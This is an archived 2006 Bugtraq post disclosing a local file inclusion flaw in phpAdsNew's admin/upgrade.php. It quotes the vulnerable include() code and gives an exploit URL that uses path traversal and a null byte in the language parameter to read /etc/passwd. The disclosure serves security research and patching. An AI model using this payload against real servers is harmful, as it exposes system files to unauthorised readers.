Bugtraq mailing list archives
phpAdsNew include bug!
From: wacky () ihack pl
Date: 17 Oct 2006 18:02:00 -0000
####################################### Autors: - Michał `wacky` Błaszczak - Nobody http://iHACK.pl ####################################### File: modules/phpads/admin/upgrade.php Code: // Load language strings if (file_exists("../language/".$phpAds_config['language']."/default.lang.php")) include("../language/".$phpAds_config['language']."/default.lang.php"); else { $phpAds_config['language'] = 'english'; include("../language/english/default.lang.php"); } Exploit: http://ihack.pl/phpAdsNew-2.0.8/admin/ upgrade.php?phpAds_config[language]=../../../etc/passwd%00
Current thread:
- phpAdsNew include bug! wacky (Oct 17)
- Re: phpAdsNew include bug! Wim Godden (Oct 18)
- <Possible follow-ups>
- Re: phpAdsNew include bug! matteo (Oct 19)